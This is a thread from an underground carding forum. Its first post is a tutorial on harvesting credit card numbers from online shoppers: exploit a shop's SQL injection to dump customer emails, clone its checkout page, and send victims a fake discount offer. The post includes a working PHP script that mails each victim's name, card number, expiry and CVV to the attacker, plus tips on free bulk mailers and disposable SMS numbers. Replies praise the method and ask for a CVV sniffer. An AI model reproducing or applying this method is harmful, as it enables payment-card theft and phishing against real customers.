Carding Forum, Carders Forum, Hackers Forum, Darknet Fraud, Best Hackers, Underground Hacking Forum
wu carding cash app bank carding iphone carding
× You can find our backup domain links in case our current one becomes inaccessible at: www.cardingforum.link Forum Support Private Message Quata

REGISTER LOGIN REGISTER LOGIN




FORUM ESCROW BITCOIN ADDRESS | BUY ADVERTISEMENT | BECOME A VERIFIED VENDOR | Forum Support Private Message Quata

iphone carding   westernunion carding   Bank Transfers, PayPal Skrill Hacked   Hacked Carded Western Union, Bank Transfer, Money Gram Transfers

PayPal carding

 credit card forum
 Payoneer carding 
  • 40 Vote(s) - 3.05 Average
  • 1
  • 2
  • 3
  • 4
  • 5
Getting Private CC's Through SQL Injection
#1
Hey all, this is my very first tutorial, so bear with me and please REP and THANK if you enjoy and/or if it helps ypu.

This is my method for getting fresh CC info, sent directly to an inbox of your choosing!

First, you need to find yourself a vulnerable shop. Won't go into too many details here, this should be pretty drilled into your head by now. You can do this with Google Dorks manually, or use tools like WebCruiser, SQLi poison, etc. What your looking for is a shop with both SQLi vulnerabilities, and XSS vulnerabilities.

First, as you may have noticed on most databases containing CC info, it's encrypted, MD5, FPE, whatever it is it's not feasible to work with that. However, one thing you can work with is the current and former customer's e-mail addresses. Go ahead and rip the whole table with the customer information. If you're lucky, you'll get at least 10,000 e-mail addresses or more.

Next, you need to work with the XSS vulnerability. I've noticed the most common being POST vulnerability, so I'll go that route, but you can incorporate it with FORM or whatever.

You can use the following code to make a redirect.html or whatever you wish to name it. This page will load the vulnerable website immediately, with one exception, a giant IFRAME over it which of course is going to be another page you make.
PHP Code:
<script language=javascript>
function submitPostLink()
:zin:{
document.postlink.submit();
}
</script>

Go ahead and goto the checkout page for the site you're working with, and save the page to your hard drive, including all the subdirectory files and images (firefox does this auto). Now, you need to edit the main file you just saved.

Search for "action=", and change the page following it to your third page you will make, which will be the PHP mail form that will send your e-mail all the information someone fills in the form. The code will look something like....
PHP Code:
$userinfo = "@com"; //your email here
$ip = getenv("REMOTE_ADDR");
$message .= "".$_POST['firstname']."\n";
$message .= "".$_POST['lastname']."\n";
$message .= "".$_POST['org_name']."\n";
$message .= "".$_POST['telephone']."\n";
$message .= "".$_POST['fax']."\n";
$message .= "".$_POST['email']."\n";
$message .= "---------------------------------------------\n";
$message .= "".$_POST['cctype']."\n";
$message .= "".$_POST['credcard']."\n";
$message .= "".$_POST['exp_mon']."\n";
$message .= "".$_POST['exp_year']."\n";
$message .= "".$_POST['cccvv']."\n";
$message .= "".$_POST['ccname']."\n";


$subject="SUBJECT - $ip";
$headers = "From: NAMEl<@.com>";
$headers .= $_POST['eMailAdd']."\n";
$headers .= "MIME-Version: 1.0\n";
mail($userinfo,$subject,$message,$headers);
You'll want to follow this code with some html code that also looks like a copy of their site but with some text saying something along the lines of "sorry, this offer is no longer available" or something of the sort. I'll explain why right now.

After putting all this together and uploading it to a host, you'll want to shorten youre redirect.html URL, you can use bit.ly, or another shortening service. Then, you can send an e-mail to all the customers e-mail addresses, (AND YOU CAN BE CREATIVE), but something along the lines of them being a valuable customer, and because of that, you're giving them one of your newest products for only 99 cents! Make sure that on your checkout form, you list the item you choose, so they see it when they're checking out.

A great service to send bulk mail for FREE, and no trial or anything, that is if you don't have hacked SMTP to use, is targethero.com

They let you send Unlimited e-mails to up to 5,000 different contacts. Not bad for free. You'll have to confirm your account with a cell phone, but you should just use receive-sms-online.com or freesmsreceive.com/index.php where you can get SMS sent to you with no registration.

Trust me, if you send enough e-mails to former customers, especially when it's in the health and supplement niche, if they get an offer for a 99 cent bottle or something, they're gonna jump all over that!

Anyway, if you have any questions, please feel free to ask, and I apologize if I was a little vague but I don't have much time right now but wanted to get this up. Enjoy!!!
Reply
Paid adv. expire in 28 days
CLICK to buy Advertisement !

    Verified & Trusted Selling Bulletproof Spamhaus Ignore - Dedicated Servers, VPS, Web Hosting

#2
nice share man thanks keep it up
Reply
#3
WE CAN SIMILARLY try WITH ACUTENIX VULNERABILITY SCANNER
Reply
#4
Good TUT. Thnx Add rep +

Anybody have code sniffer cvv with php? If yep - plz give PM this.
Reply
#5
thankyou for the amzing post bro, I'm a newbie spammer !
Reply
Paid adv. expire in 28 days
CLICK to buy Advertisement !

    Verified & Trusted Selling Bulletproof Spamhaus Ignore - Dedicated Servers, VPS, Web Hosting

#6
Hi,i want to learn how to get fresh cc through sql injections pls
Reply
#7
nice post bro
Reply


Possibly Related Threads…
Thread Author Replies Views Last Post
  Private paypal scam 2021 + letter jeremy933 7 7,896 Today,
Last Post: muratt0707
  SQL Injection Hacking [Tutorial] Fuckaar 1 9,449 Today,
Last Post: coco
  How to card WU (NEW TUTORIAL PRIVATE) rafy 8 10,724 Today,
Last Post: Fadidi12
  How To Basic Sql Injection Dragunman 0 5,351 Today,
Last Post: Dragunman
  133720 SSI injection challenge[Easy] Spanak 0 5,230 Today,
Last Post: Spanak

Forum Jump:


Users browsing this thread: 70 Guest(s)